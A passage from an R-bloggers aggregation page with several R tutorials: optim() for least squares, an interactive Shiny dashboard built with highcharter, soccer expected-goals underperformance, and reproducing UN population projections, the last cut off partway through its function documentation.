R-bloggers

Test title

R Stories — Mon, 06 May 2024 00:00:00 +0000

[This article was first published on R Stories, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

To leave a comment for the author, please follow the link and comment on their blog: R Stories.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Test title

optim Function in R

R Archives » Data Science Tutorials — Sun, 05 May 2024 09:43:14 +0000

[This article was first published on R Archives » Data Science Tutorials, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

The post optim Function in R appeared first on Data Science Tutorials

Unravel the Future: Dive Deep into the World of Data Science Today! Data Science Tutorials.

optim Function in R, we will explore how to apply a general-purpose optimization using the optim function in R programming language.

We will create example data and then demonstrate the usage of the optim function to minimize the residual sum of squares.

optim Function in R

First, let’s create the example data we will use for this tutorial:

# Set a random seed for reproducibility
set.seed(123)

# Create random data
x <- rnorm(500)
y <- rnorm(500) + 0.7 * x

# Combine x and y into a data frame
data <- data.frame(x, y)

# Print the head of the data
head(data)

This code generates a data frame with two numeric variables, x and y.

        x          y
1 -0.56047565 -0.9942258
2 -0.23017749 -1.1548228
3  1.55870831  2.1178809
4  0.07050839  0.8004172
5  0.12928774 -1.4186651
6  1.71506499  1.1053980

Example: Applying optim Function in R

Now, let’s apply the optim function to minimize the residual sum of squares. We will manually create a function for this purpose:

# Manually create a function for residual sum of squares
optm_function <- function(data, par) {
  with(data, sum((par[1] + par[2] * x - y)^2))
}

Next, we can use the optim function as shown below.

The par argument specifies the initial values for the parameters to be optimized over, the fn argument specifies our function, and the data argument specifies our data frame.

We store the output of the optim function in the optim_output object:

# Applying optim
optim_output <- optim(par = c(0, 1),
                      fn = optm_function,
                      data = data)

Finally, we can visualize our results in a plot. We will compare the results of the optim function with those of a conventional linear model provided by the lm function:

# Set plot parameters
par(mfrow = c(1, 2))

# Plot results of the optim function
plot(data$x, data$y, main = "optim Function")
abline(optim_output$par[1], optim_output$par[2], col = "red")

# Plot results of the lm function
plot(data$x, data$y, main = "lm Function")
abline(lm(y ~ x, data), col = "green")

The resulting plot (Figure 1) should show that both the optim and lm functions returned the same result, indicating that our manual optimization using the optim.

The post optim Function in R appeared first on Data Science Tutorials

Unlock Your Inner Data Genius: Explore, Learn, and Transform with Our Data Science Haven! Data Science Tutorials.

To leave a comment for the author, please follow the link and comment on their blog: R Archives » Data Science Tutorials.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: optim Function in R

R Shiny Highcharts – How to Create Interactive and Animated Shiny Dashboards

Dario Radečić — Sun, 05 May 2024 07:00:20 +0000

[This article was first published on Tag: r - Appsilon | Enterprise R Shiny Dashboards, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Welcome to the third (and final) part of our R Highcharts article series. So far, you’ve learned how to make basic interactive charts, and how to make drilldown charts. These two articles are a must-read before going over this one, since today the focus will be on code rather than explanations.

After reading today’s piece, you’ll know how to create interactive and animated dashboards with the R Shiny Highcharts module – both through basic charts and drill-downs. We’ll also go over some basics of R Shiny, such as filtering and styling. Let’s dig in!

Are your R/Shiny team skills up to date? Take them to next level by reading our ebook.

Exploring R Shiny Highcharts Dashboard Elements

The application we’re about to create will contain a couple of elements, so it’s a good idea to explain what’s where and what does what. It will be based on the Gapminder datatset, and will show information such as life expectancy, population, and GDP per continent, year, and country.

Here’s a sketch of the application:

Image 1 – Sketch of our application

‍

As you can see, the application starts with a couple of filters. These allow the user to control the continent and start/end years. Not all values and charts will be affected by the year filters, as some of them will show only the most recent values (2007).

In the Latest stats section, you’ll see four boxes showing information on the number of countries and other various statistics for a given continent. The year filters won’t do anything to these boxes, as only the most recent values will be shown.

Below, we have two Summary stats charts. These will be a bar chart showing median life expectancy by year, and a line chart showing population by year. These two are affected by both the continent and year filter values. It’s also worth noting that they show an average across all countries in a continent, so some degree of skew is to be expected.

And finally, we have the Drilldown section. It contains only one chart which shows the most recent population across the country for a given continent. When you click on an individual bar, you’ll see the population stats across years only for the given country. Neat!

Let’s start building the thing!

Building the R Shiny Highcharts Dashboard

This section will be quite code-intensive and will require fundamental R Shiny knowledge. If you’re a complete beginner, we recommend checking our library of Shiny articles first.

Let’s start with the easiest part – summary stats.

Summary Stats Cards

Truth be told, filters and summary stats have nothing to do with R Highcharts, but will take our dashboard to the next level. As mentioned before, we’re working with the Gapminder dataset, and the idea is to allow the user to select a continent and a year range from which the dashboard contents will get updated.

The Shiny app’s UI is divided into two parts – sidebarPanel() and mainPanel(). The first one contains all UI controls (filters), while the second one renders the contents.

Regarding filters, R’s unique() function is quite useful here, as it allows us to grab only distinct elements from a categorical variable. For the years filters, we’ll remove the highest year from the min filter and the lowest year from the max filter.

The contents of mainPanel() are organized in a way that we have one container with four containers inside it – each of which contains one summary statistic.

As for the server(), we’re simply creating a reactive dataset that calculates the summary statistics based on the selected continent and then using renderText() to display the values for each summary statistics card.

Here’s the full code snippet:

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        inputId = "inContinent",
        label = "Continent:",
        choices = unique(gapminder$continent),
        selected = "Europe"
      ),
      selectInput(
        inputId = "inYearMin",
        label = "Start year:",
        choices = unique(gapminder$year)[1:length(unique(gapminder$year)) - 1],
        selected = min(gapminder$year)
      ),
      selectInput(
        inputId = "inYearMax",
        label = "End year:",
        choices = unique(gapminder$year)[2:length(unique(gapminder$year))],
        selected = max(gapminder$year)
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        tags$div(
          tags$p("#Countries"),
          textOutput(outputId = "outNCountries")
        ),
        tags$div(
          tags$p("Median life exp."),
          textOutput(outputId = "outMedLifeExp")
        ),
        tags$div(
          tags$p("Median population"),
          textOutput(outputId = "outMedPop")
        ),
        tags$div(
          tags$p("Median GDP"),
          textOutput(outputId = "outMedGDP")
        )
      ),
      width = 9
    )
  )
)

server <- function(input, output) {
  data_cards <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        year == max(year)
      ) %>%
      summarise(
        nCountries = n_distinct(country),
        medianLifeExp = median(lifeExp),
        medianPopM = median(pop / 1e6),
        medianGDP = median(gdpPercap)
      )
  })
  
  output$outNCountries <- renderText({
    data_cards()$nCountries
  })
  output$outMedLifeExp <- renderText({
    paste(round(data_cards()$medianLifeExp, 1), "years")
  })
  output$outMedPop <- renderText({
    paste0(round(data_cards()$medianPopM, 2), "M")
  })
  output$outMedGDP <- renderText({
    paste0("$", round(data_cards()$medianGDP, 2))
  })
}


shinyApp(ui = ui, server = server)

And here’s what the R Shiny Highcharts application looks like:

‍

Image 2 – R Shiny Highcharts dashboard (1)

‍

The values are there and correct, but we’d benefit tremendously from a bit of styling. Let’s introduce CSS next.

Basic Dashboard Styling

You can use both CSS and SCSS to style your R Shiny dashboards. We’ll stick with the first option.

Create a www/styles.css file and paste the following inside it:

@import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,700;1,400&display=swap');

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

body {
  font-family: 'Poppins', sans-serif;
  font-weight: 400;
}

.main-container {
  padding-top: 1rem;
}

.stat-card-container {
  display: flex;
  justify-content: space-between;
  column-gap: 1rem;
}

.stat-card {
  border: 2px solid #f2f2f2;
  border-bottom: 2px solid #0198f9;
  width: 100%;
  padding: 0.5rem 0 0.5rem 1rem;
}

.stat-card > p {
  text-transform: uppercase;
  color: #808080;
}

.stat-card > div.shiny-text-output {
  font-size: 3rem;
  font-weight: 700;
}

‍

Long story short, this piece of code will change the overall font, reset a couple of styles, and make our dashboard nicer to look at.

The only problem is – the CSS file isn’t connected with R Shiny.

What you’ll need to do is to add a link tag to the head of the application and reference our styles.css file (Shiny assumes it’s located in the www folder). You’ll also want to add CSS class names to HTML attributes by piping the tagAppendAttributes(class = "class-name") function at the end of it.

Only the code in ui has changed, server() is identical as before:

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  tags$head(
    tags$link(rel = "stylesheet", type = "text/css", href = "styles.css")
  ),
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        tags$div(
          tags$p("# Countries:"),
          textOutput(outputId = "outNCountries")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median life exp:"),
          textOutput(outputId = "outMedLifeExp")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median population:"),
          textOutput(outputId = "outMedPop")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median GDP:"),
          textOutput(outputId = "outMedGDP")
        ) %>% tagAppendAttributes(class = "stat-card")
      ) %>% tagAppendAttributes(class = "stat-card-container"),
      width = 9
    ) %>% tagAppendAttributes(class = "main-container")
  )
)

server <- function(input, output) {
  ...
}


shinyApp(ui = ui, server = server)

Our R Shiny application is now significantly more appealing:

‍

Image 3 – R Shiny Highcharts dashboard (2)

We now have everything needed to introduce some visualizations with Highcharts.

Adding Basic R Highcharts

So far, we’ve successfully set the stage, so let’s dive into the good stuff now. This section will walk you through two basic Highcharts visualizations in R Shiny, and these will show the following:

Median life expectancy by year: For all countries in a selected continent and a selected year range.
Median GDP by year: Once again, the median is calculated on a per-country level for a continent and a selected year range.

You can work with Highcharts visualizations in R Shiny by calling the highchartOutput() function in ui(). It accepts an outputId and an optional height parameter, so you can easily tweak the basic looks straight from R.

Down in server(), it’s a familiar situation (if you’ve been following along with the series). We have a new data frame – data_charts – and it contains the filtered and aggregated life expectancy and GDP data. The renderHighchart() is used to create a Highcharts visualization, and it accepts a block of familiar functions:

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  tags$head(
    tags$link(rel = "stylesheet", type = "text/css", href = "styles.css")
  ),
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        ...
      ) %>% tagAppendAttributes(class = "stat-card-container"),
      
      tags$div(
        tags$h3("Summary stats:"),
        tags$div(
          tags$div(
            highchartOutput(outputId = "chartLifeExpByYear",  height = 500)
          ) %>% tagAppendAttributes(class = "chart-card"),
          tags$div(
            highchartOutput(outputId = "chartGDPByYear", height = 500)
          ) %>% tagAppendAttributes(class = "chart-card"),
        ) %>% tagAppendAttributes(class = "base-charts-container")
      ) %>% tagAppendAttributes(class = "card-container"),
      
      width = 9
    ) %>% tagAppendAttributes(class = "main-container")
  )
)

server <- function(input, output) {
  data_cards <- reactive({
    ...
  })
  
  data_charts <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        between(year, as.integer(input$inYearMin), as.integer(input$inYearMax))
      ) %>%
      group_by(year) %>%
      summarise(
        medianLifeExp = round(median(lifeExp), 1),
        medianGDP = round(median(gdpPercap), 2)
      )
  })
  
  
  output$outNCountries <- renderText({
    ...
  })
  output$outMedLifeExp <- renderText({
    ...
  })
  output$outMedPop <- renderText({
    ...
  })
  output$outMedGDP <- renderText({
    ...
  })
  
  output$chartLifeExpByYear <- renderHighchart({
    hchart(data_charts(), "column", hcaes(x = year, y = medianLifeExp), color = "#0198f9", name = "Median life expectancy") |>
      hc_title(text = "Median life expectancy by year", align = "left") |>
      hc_xAxis(title = list(text = "Year")) |>
      hc_yAxis(title = list(text = "Life expectancy"))
  })
  
  output$chartGDPByYear <- renderHighchart({
    hchart(data_charts(), "line", hcaes(x = year, y = medianGDP), color = "#800000", name = "Median GDP") |>
      hc_title(text = "Median GDP by year", align = "left") |>
      hc_xAxis(title = list(text = "Year")) |>
      hc_yAxis(title = list(text = "GDP"))
  })
}


shinyApp(ui = ui, server = server)

We’ve also added some CSS classes to app.R, so here’s the corresponding CSS code for them:

.card-container {
  padding-top: 2rem;
}

.base-charts-container {
  display: flex;
  justify-content: space-between;
  column-gap: 1rem;
}

.chart-card {
  border: 2px solid #f2f2f2;
  width: 50%;
}

And this is what the application looks like now:

‍

Image 4 – R Shiny Highcharts dashboard (3)

‍

Both charts look amazing, are fully interactive, and have a nice animation when first loading the dashboard or when refreshing the data.

The only thing left to do is to include a drilldown chart, so let’s go over that next.

Adding a Highcharts Drilldown Chart

A drilldown chart will allow the user to click on individual chart elements to see a new, drilled-down version of the visualization. In our case, we’ll have a per-country column chart of the population for a selected continent (only for the latest year) by default. When a column is clicked, a new column chart appears showing only the population for the clicked country through time.

Seems easy enough, but remember – we’ll need two datasets. The first one is for the default visualization, and the second is for the drilled-down chart. If you’ve read the previous article you already know what you need to do.

To recap, the drilled-down dataset needs a column of type list that contains the data that’ll be visible when a single column is clicked. The hc_drilldown() function is then used to enable drilldown mode.

Here’s the code:

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  tags$head(
    tags$link(rel = "stylesheet", type = "text/css", href = "styles.css")
  ),
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        ...
      ) %>% tagAppendAttributes(class = "stat-card-container"),
      tags$div(
        ...
      ) %>% tagAppendAttributes(class = "card-container"),

      tags$div(
        tags$h3("Drilldown:"),
        tags$div(
          highchartOutput(outputId = "chartDrilldown", height = 500)
        ) %>% tagAppendAttributes(class = "chart-card chart-card-full")
      ) %>% tagAppendAttributes(class = "card-container"),
      width = 9
    ) %>% tagAppendAttributes(class = "main-container")
  )
)

server <- function(input, output) {
  data_cards <- reactive({
    ...
  })
  
  data_charts <- reactive({
    ...
  })
  
  drilldown_chart_base_data <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        year == max(year)
      ) %>%
      group_by(country) %>%
      summarise(
        pop = round(pop, 1)
      ) %>%
      arrange(desc(pop))
  })
  
  drilldown_chart_drilldown_data <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        between(year, as.integer(input$inYearMin), as.integer(input$inYearMax))
      ) %>%
      group_nest(country) %>%
      mutate(
        id = country,
        type = "column",
        data = map(data, mutate, name = year, y = pop),
        data = map(data, list_parse)
      )
  })
  
  
  output$outNCountries <- renderText({
    ...
  })
  output$outMedLifeExp <- renderText({
    ...
  })
  output$outMedPop <- renderText({
    ...
  })
  output$outMedGDP <- renderText({
    ...
  })
  
  output$chartLifeExpByYear <- renderHighchart({
    ...
  })
  
  output$chartGDPByYear <- renderHighchart({
    ...
  })
  
  output$chartDrilldown <- renderHighchart({
    hchart(
      drilldown_chart_base_data(),
      "column",
      hcaes(x = country, y = pop, drilldown = country),
      name = "Population"
    ) %>%
      hc_drilldown(
        allowPointDrilldown = TRUE,
        series = list_parse(drilldown_chart_drilldown_data())
      ) |>
      hc_colors(c("#004c5f")) |>
      hc_title(text = "Population report", align = "left") |>
      hc_xAxis(title = list(text = "")) |>
      hc_yAxis(title = list(text = "Population"))
  })
}


shinyApp(ui = ui, server = server)

‍

There’s only a slight addition needed in styles.css to make our chart card 100% wide:

.chart-card-full {
  width: 100%;
}

And that’s it – we have a finished R Shiny Highcharts dashboard now:

‍

Image 5 – R Shiny Highcharts dashboard (4)

‍

You can probably make it look better by tweaking the styles, but it does the job perfectly even in this state. Let’s make a brief recap next.

Full Source Code

In case you’ve missed something or just want to copy/paste the code, this section is for you.

`app.R`

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  tags$head(
    tags$link(rel = "stylesheet", type = "text/css", href = "styles.css")
  ),
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        inputId = "inContinent",
        label = "Continent:",
        choices = unique(gapminder$continent),
        selected = "Europe"
      ),
      selectInput(
        inputId = "inYearMin",
        label = "Start year:",
        choices = unique(gapminder$year)[1:length(unique(gapminder$year)) - 1],
        selected = min(gapminder$year)
      ),
      selectInput(
        inputId = "inYearMax",
        label = "End year:",
        choices = unique(gapminder$year)[2:length(unique(gapminder$year))],
        selected = max(gapminder$year)
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        tags$div(
          tags$p("# Countries:"),
          textOutput(outputId = "outNCountries")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median life exp:"),
          textOutput(outputId = "outMedLifeExp")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median population:"),
          textOutput(outputId = "outMedPop")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median GDP:"),
          textOutput(outputId = "outMedGDP")
        ) %>% tagAppendAttributes(class = "stat-card")
      ) %>% tagAppendAttributes(class = "stat-card-container"),
      tags$div(
        tags$h3("Summary stats:"),
        tags$div(
          tags$div(
            highchartOutput(outputId = "chartLifeExpByYear", height = 500)
          ) %>% tagAppendAttributes(class = "chart-card"),
          tags$div(
            highchartOutput(outputId = "chartGDPByYear", height = 500)
          ) %>% tagAppendAttributes(class = "chart-card"),
        ) %>% tagAppendAttributes(class = "base-charts-container")
      ) %>% tagAppendAttributes(class = "card-container"),
      tags$div(
        tags$h3("Drilldown:"),
        tags$div(
          highchartOutput(outputId = "chartDrilldown", height = 500)
        ) %>% tagAppendAttributes(class = "chart-card chart-card-full")
      ) %>% tagAppendAttributes(class = "card-container"),
      width = 9
    ) %>% tagAppendAttributes(class = "main-container")
  )
)

server <- function(input, output) {
  data_cards <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        year == max(year)
      ) %>%
      summarise(
        nCountries = n_distinct(country),
        medianLifeExp = median(lifeExp),
        medianPopM = median(pop / 1e6),
        medianGDP = median(gdpPercap)
      )
  })
  
  data_charts <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        between(year, as.integer(input$inYearMin), as.integer(input$inYearMax))
      ) %>%
      group_by(year) %>%
      summarise(
        medianLifeExp = round(median(lifeExp), 1),
        medianGDP = round(median(gdpPercap), 2)
      )
  })
  
  drilldown_chart_base_data <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        year == max(year)
      ) %>%
      group_by(country) %>%
      summarise(
        pop = round(pop, 1)
      ) %>%
      arrange(desc(pop))
  })
  
  drilldown_chart_drilldown_data <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        between(year, as.integer(input$inYearMin), as.integer(input$inYearMax))
      ) %>%
      group_nest(country) %>%
      mutate(
        id = country,
        type = "column",
        data = map(data, mutate, name = year, y = pop),
        data = map(data, list_parse)
      )
  })
  
  
  output$outNCountries <- renderText({
    data_cards()$nCountries
  })
  output$outMedLifeExp <- renderText({
    paste(round(data_cards()$medianLifeExp, 1), "years")
  })
  output$outMedPop <- renderText({
    paste0(round(data_cards()$medianPopM, 2), "M")
  })
  output$outMedGDP <- renderText({
    paste0("$", round(data_cards()$medianGDP, 2))
  })
  
  output$chartLifeExpByYear <- renderHighchart({
    hchart(data_charts(), "column", hcaes(x = year, y = medianLifeExp), color = "#0198f9", name = "Median life expectancy") |>
      hc_title(text = "Median life expectancy by year", align = "left") |>
      hc_xAxis(title = list(text = "Year")) |>
      hc_yAxis(title = list(text = "Life expectancy"))
  })
  
  output$chartGDPByYear <- renderHighchart({
    hchart(data_charts(), "line", hcaes(x = year, y = medianGDP), color = "#800000", name = "Median GDP") |>
      hc_title(text = "Median GDP by year", align = "left") |>
      hc_xAxis(title = list(text = "Year")) |>
      hc_yAxis(title = list(text = "GDP"))
  })
  
  output$chartDrilldown <- renderHighchart({
    hchart(
      drilldown_chart_base_data(),
      "column",
      hcaes(x = country, y = pop, drilldown = country),
      name = "Population"
    ) %>%
      hc_drilldown(
        allowPointDrilldown = TRUE,
        series = list_parse(drilldown_chart_drilldown_data())
      ) |>
      hc_colors(c("#004c5f")) |>
      hc_title(text = "Population report", align = "left") |>
      hc_xAxis(title = list(text = "")) |>
      hc_yAxis(title = list(text = "Population"))
  })
}


shinyApp(ui = ui, server = server)

`www/styles.css`

@import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,700;1,400&display=swap');

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

body {
  font-family: 'Poppins', sans-serif;
  font-weight: 400;
}

.main-container {
  padding-top: 1rem;
}

.stat-card-container {
  display: flex;
  justify-content: space-between;
  column-gap: 1rem;
}

.stat-card {
  border: 2px solid #f2f2f2;
  border-bottom: 2px solid #0198f9;
  width: 100%;
  padding: 0.5rem 0 0.5rem 1rem;
}

.stat-card > p {
  text-transform: uppercase;
  color: #808080;
}

.stat-card > div.shiny-text-output {
  font-size: 3rem;
  font-weight: 700;
}

.card-container {
  padding-top: 2rem;
}

.base-charts-container {
  display: flex;
  justify-content: space-between;
  column-gap: 1rem;
}

.chart-card {
  border: 2px solid #f2f2f2;
  width: 50%;
}

.chart-card-full {
  width: 100%;
}

Summing up R Shiny Highcharts

This article concludes our three-part series on R Highcharts. You’ve learned how to make basic interactive visualizations, how to make drilldown charts, and today, how to tie it all together with R Shiny. You now have everything needed to leverage Highcharts on your next project or to build an impressive resume of Shiny applications.

Today’s article was a bit heavier on the code and lighter on explanations – that’s because you already know how things work, and our resulting app has a fair amount of reactive code. We hope it was easy enough to follow, but make sure to pop your question(s) in the comment section below if anything is not 100% clear.

As always, thanks for reading, and stay tuned to the Appsilon blog and our newsletter, Shiny Weekly to learn more about R/Shiny.

If you’re wondering what else you need to start a career in R Shiny – We have a 2024-ready guide for you.

The post appeared first on appsilon.com/blog/.

To leave a comment for the author, please follow the link and comment on their blog: Tag: r - Appsilon | Enterprise R Shiny Dashboards.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: R Shiny Highcharts – How to Create Interactive and Animated Shiny Dashboards

Estimating Shooting Performance Unlikeliness

Tony ElHabr — Sun, 05 May 2024 05:00:00 +0000

[social4i size="small" align="align-left"] -->

[This article was first published on Tony's Blog, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Introduction

Towards the end of each soccer season, we naturally start to look back at player stats, often looking to see who has performed worse compared to their past seasons. We may have different motivations for doing so–e.g. we may be trying to attribute team under-performance to individuals, we may be hypothesizing who is likely to be transferred or resigned, etc.

It’s not uncommon to ask “How unlikely was their shooting performance this season?” when looking at a player who has scored less than goals than expected.¹ For instance, if a striker only scores 9 goals on 12 expected goals (xG), their “underperformance” of 3 goals jumps off the page.

The “Outperformance” () ratio–the ratio of a player ’s goals to expected goals –is a common way of evaluating a player’s shooting performance.²

An ratio of 1 indicates that a player is scoring as many goals as expected; a ratio greater than 1 indicates underperformance; and a ratio less than 1 indicates overperformance. Our hypothetical player underperformed with .

In most cases, we have prior seasons of data to use when evaluating a player’s ratio for a given season. For example, let’s say our hypothetical player scored 14 goals on 10 xG () in the season prior, and 12 goals on 8 xG () before that. A after those seasons seems fairly unlikely, especially compared to an “average” player who theoretically achieves ratio every year.

So how do we put a number on the unlikeliness of that for our hypothetical player, accounting for their prior season-long performances?

Data

I’ll be using public data from FBref for the 2018/19 – 2023/24 seasons of the the Big Five European soccer leagues, updated through April 25. Fake data is nice for examples, but ultimately we want to test our methods on real data. Our intuition about the results can be a useful caliber of the sensibility of our results.

Get shot data

Reproducing and adapting the UN Population Projections by @ellis2013nz

free range statistics - R — Sun, 05 May 2024 00:00:00 +0000

[This article was first published on free range statistics - R, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

I set out to see if it was possible to reproduce the UN’s 2022 Revision of World Population Prospects for a given country by cohort component projection from the fertility, mortality and immigration rates and population starting point published as part of their projection. The motivation is to make small changes to some of those parameters – for example by substituting in a recent census result for the population and a given year – and “re-run” the projections to see the impact of changes, or to get a more up-to-date version with data that wasn’t available to the UN at the time of their projection.

It turns out this wasn’t too hard (one morning’s work for the modelling, then a few hours of write-up), particularly in cases where migration is small in the projection period. I was able to reproduce almost exactly population, birth and death totals to 2100 for Vanuatu, and demonstrate the impact of updating the 2020 year for their recent census population totals and fertility rates, and getting a slightly lower projection as a result.

Here’s my reproduction of Vanuatu’s population projection from 2020 to 2100, using just the 2020 population totals and the forecast fertility, mortality and migration rates. As you can see it’s basically identical to the UN totals:

And here’s the same method tweaked for the actual 2020 census total and with a rough adjustment made to fertility rates based on what was observed at the 2020 census:

Of course, this method delivers a full set of projections by age and sex, and we could construct life tables or any indicators we want from it. Here are population pyramids comparing the published UN projections for 2050 with my revised set. Not visually stunning in its comparison, but enough to prove that it’s possible:

Reproducing UN projections

So here’s how I went about that.

First, downloading all the data. The UN recommend bulk downloads of their CSV files. For my purposes I first need the fertility, mortality and population by sex and one year age groups. Of the population original data I am only going to use the 2020 year, and then project it forward myself based on fertility, mortality and migration; but I want the full set for comparison purposes. For migration, I couldn’t see in my hasty look at the UN site a dataset of migration projections by age and sex, so I just use the much simpler net migration rate (per thousand people) per year in the projection period. Here’s code to download all this UN data:

library(tidyverse)
library(glue)
library(scales)
library(patchwork)

dir.create("data-pop-proj-2022", showWarnings = FALSE)

#------------------download and import data for all countries from existing projections----------------
list.files("data-pop-proj-2022")

files <- c("WPP2022_Fertility_by_Age1.zip",
           "WPP2022_DeathsBySingleAgeSex_Medium_1950-2021.zip",
           "WPP2022_DeathsBySingleAgeSex_Medium_2022-2100.zip",
           "WPP2022_Population1JanuaryBySingleAgeSex_Medium_1950-2021.zip",
           "WPP2022_Population1JanuaryBySingleAgeSex_Medium_2022-2100.zip",
           "WPP2022_Demographic_Indicators_Medium.zip"
           )

# let downloads take up to 10 minutes rather than 1 minute max, as files are
# large (largest is fertility for single age, 78MB)
options(timeout=600)

if(!file.exists("data-pop-proj-2022/WPP2022_Demographic_Indicators_Medium.csv")){
  # download the zip files:
  for(i in 1:length(files)){
    download.file(glue("https://population.un.org/wpp/Download/Files/1_Indicators%20(Standard)/CSV_FILES/{files[i]}"),
                   destfile = glue("data-pop-proj-2022/{files[i]}"), mode = "wb")
  }
  
  # unzip them
  for(i in 1:length(files)){
    unzip(glue("data-pop-proj-2022/{files[i]}"), exdir = "data-pop-proj-2022")
  }
}

fert_all    <- read_csv("data-pop-proj-2022/WPP2022_Fertility_by_Age1.csv")
mort_past   <- read_csv("data-pop-proj-2022/WPP2022_DeathsBySingleAgeSex_Medium_1950-2021.csv")
mort_future <- read_csv("data-pop-proj-2022/WPP2022_DeathsBySingleAgeSex_Medium_2022-2100.csv")
pop_past    <- read_csv("data-pop-proj-2022/WPP2022_Population1JanuaryBySingleAgeSex_Medium_1950-2021.csv")
pop_future  <- read_csv("data-pop-proj-2022/WPP2022_Population1JanuaryBySingleAgeSex_Medium_2022-2100.csv")
indicators  <- read_csv("data-pop-proj-2022/WPP2022_Demographic_Indicators_Medium.csv")

mort_all <- rbind(mort_past, mort_future)
pop_all <- rbind(pop_past, pop_future)

# clean up
rm(mort_past, mort_future, pop_past, pop_future)

Next, I wrote my own cohort component population projection function. I wanted to do this from scratch rather than using an existing demography package to make sure I understood what was happening (I’m not a demographer) and could make tweaks as necessary to match the UN approach. I used this tutorial by Farid Flici as my starting point; abstracted his code into a function for easy use with multiple countries, and added a net migration component.

Because migrants’ ages tend to be dissimilar from the country they are migrating too - they are more likely to be in the prime of their working / family life I believe - I needed a way to set the ages of migrants. In the function below I defaulted to a normal distribution of ages, mean 28 and standard deviation 11, which worked well to get similar results to the UN in a few countries I tried. This was the hardest and most discretionary part of the exercise.

My observation is that demographers seem to think in terms of matrices of numbers rather than database-oriented tidy data, and I have kept that matrix approach in this function.

#----------------------projections for one country-------------------

# adapting the implementation of the method for cohort component projection at 
# https://farid-flici.github.io/tuto.html


#' @param start_pop_m is a vector of population of males at single year age
#'   periods beginning of year starting age 0
#' @param start_pop_f as start_pop_m but for females
#' @param start_year first year ie the year for which the actual population
#'   number refers to
#' @param end_year end year for the population projection
#' @param fertility a matrix with rows for female agegroups 15 to 49 and a
#'   column for each year, values are births per woman (not per thousand women)
#'   that year and age. Must have 35 rows and number of columns equal to
#'   end_year minus start_year plus one.
#' @param mort_m a matrix with rows for age 0 to at least 50 and columns for
#'   each year, for males. Must have number of columns equal to end_year minus
#'   start_year plus one.
#' @param mort_f as mort_m but for females. Must have same number of rows and
#'   columns as mort_m.
#' @param sex_ratio_birth number of boys born for every girl born, vector with
#'   length of years to be projected.
#' @param net_migration vector of proportions of the population that migrate to
#'   the country, net of those who leave. Defaults to a vector of zeroes.
#' @param female_share_migration vector of proportions of net migrants that are
#'   female. Defaults to a vector of 0.5s.
#' @param migration_age_weights vector of relative distribution of the age of
#'   net migrants. Must be 121 values representing relative proportion of net
#'   migrants aged zero to 120. Defaults to a normal distribution of mean 28 and
#'   standard deviation 11. Note that this distribution currently must be the
#'   same through the projection period (unlike eg fertility and mortality,
#'   which have individual values for each age group and sex for each year).
